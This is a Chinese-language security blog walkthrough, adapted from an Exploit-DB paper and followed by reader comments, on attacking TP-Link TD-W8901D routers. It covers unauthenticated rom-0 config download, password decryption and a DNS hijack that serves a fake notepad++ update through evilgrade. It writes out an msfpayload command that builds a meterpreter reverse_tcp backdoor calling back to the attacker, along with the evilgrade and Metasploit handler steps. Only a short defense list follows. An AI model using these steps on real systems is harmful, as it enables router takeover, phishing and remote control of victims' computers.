TPLINK渗透实战

楚无伤 2014-07-16 10:32:00

from: http://www.exploit-db.com/wp-content/themes/exploit/docs/33369.pdf

0x00 工具


一台笔记本电脑 TD-W8901D路由器(firmware 6.0.0) 虚拟机(WIN7)、Kali Linux(攻击机)、evilgrade(一个模块化的脚本框架,可实现伪造的升级、自带DNS和WEB服务模块,http://www.infobyte.com.ar/down/isr-evilgrade-Readme.txt) Metasploit。

0x01 示例


互联网攻击示意图:

局域网攻击示意图

市场上有很多类型的路由器可用,但绝大部分从未升级固件,所以可对大多数家用路由进行这个攻击,在这个项目中使用的是最常见的TPlink路由器。

TPLINK某些版本有一个关键的漏洞:未授权访问Firmware/Romfile界面,无需登陆密码,像这样http://IP//rpFWUpload.html。

同时也可以下载romfile备份文件(rom-0),像这样:http://IP address/rom-0。

步骤一:下载rom文件

下载回来的rom文件需要逆向工程得到明文密码,但有一个更简单的方法,去俄罗斯的一个网站可以解密 http://www.hakim.ws/huawei/rom-0/

步骤二:使用账号密码登陆

第三步:使用搜索引擎SHODAN 搜索RomPager,可在互联网上找到700多万个这种设备

简单的改变一下路由器的DNS,就可以重定向用户的请求,这个方法可以用来钓鱼(从我了解的情况看来,国内已经有大批路由被利用,并已经被黑产用作钓鱼欺诈,黑产表打我,我猜的)。但这个太简单了,作者希望玩的更高(hua)深(shao)一些。

默认DNS的配置是这样:

改成攻击者自己的DNS:

攻击系统:DNS服务器一台、kali预装了evilgrade 和metasploit。

第五步:建一个带后门的payload,给用户发送升级指令。LHOST= 攻击者机器IP和 LPORT =任何开放的端口。

Commad:@@# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.5.132 LPORT=8080 x > navebackdoor.exe 

第六步:启动metasploit、运行payload

第七步:设置监听主机和监听端口,命令:set LHOST(攻击者的IP)、set LPORT(监听端口,创建后门时分配的)、exploit(进行攻击)

第八步:启动假的WEB升级服务器evilgrade,执行show modules后,可以看到很多假更新模块,这里选用notepadplus

第九步:show options可以看到模块的使用方法,设置后门升级文件路径使用agent:

Set  agent  ‘[“<%OUT%>/root/Desktop/navebackdoor.exe<%OUT%>”]’ 

第十步:完成以上动作后,启动EvilGrade的WEB服务器:

start

第十一步:等受害者打开notepadplus,一旦打开就会弹出要求更新的提示,更新过程中将会加载我们的后门程序。

第十二步:在攻击机器上,evilgrade和Metasploit建立会话,等待返回的shell

第十三步:拿到shell,使用sysinfo查看一下:

输入help可以看到很多命令,包括scrrenshot、killav,运行vnc 等

0x02 防御方法


经常升级你的路由器版本

路由器不要在公网暴露

系统和软件升级时检查证书

设置静态IP,比如google的8.8.8.8、8.8.4.4(广告:阿里巴巴的公共dns 223.5.5.5 和 223.6.6.6)

评论

◕‿◕ 2014-07-16 10:40:29

哈哈呵呵 第一楼 这个不错

B

Bloodwolf 2014-07-16 13:26:08

话说直接set一下,就玩事了。。

路人甲 2014-07-16 15:53:11

不错,赞

Z

zeracker 2014-07-16 17:46:21

洞主来参加众测吧。

X

xsser 2014-07-16 20:03:34

@_@

路人甲 2014-07-16 21:43:23

2013左右的路由都不存在着几个洞子了,,表示鸡肋了。。。。

路人甲 2014-07-17 01:33:13

"路由器不要在公网暴露"这个有点难

C

Cc. 2014-07-17 01:53:08

啊哈哈哈

Z

zzR 2014-07-17 08:44:07

洞主玩的好溜~

A

Anymous 2014-07-17 12:39:04

只能伪造notepad++的更新吗?
某数字会检查DNS吧?

3

3xpl0it 2014-07-17 14:21:29

老大,你太厉害了。亲一个。

F

fuckadmin 2014-07-17 15:55:38

http://www.exploit-db.com/wp-content/themes/exploit/docs/33369.pdf
我是活雷峰~~~~

A

acfuner 2014-07-20 02:08:07

。。。tplink漏洞,如果其他路由器呢,这运气有些屌

H

HackBraid 2014-07-21 11:10:48

这个厉害,学习了

路人甲 2014-07-21 18:20:52

厉害

X

xsser 2015-11-19 21:31:08

xuexi le

L

LaTCue 2016-06-19 17:18:15

@aaa 然而电信没有给我公网IP 2333

楚无伤

某安全公司的家伙

twitter weibo github wechat

随机分类

数据安全 文章:29 篇
软件安全 文章:17 篇
数据分析与机器学习 文章:12 篇
区块链 文章:2 篇
网络协议 文章:18 篇

扫码关注公众号

WeChat Offical Account QRCode

最新评论

Article_kelp

因为这里的静态目录访功能应该理解为绑定在static路径下的内置路由,你需要用s

N

Nas

师傅您好!_static_url_path那 flag在当前目录下 通过原型链污

Z

zhangy

你好,为什么我也是用windows2016和win10,但是流量是smb3,加密

K

k0uaz

foniw师傅提到的setfge当在类的字段名成是age时不会自动调用。因为获取

Yukong

🐮皮

目录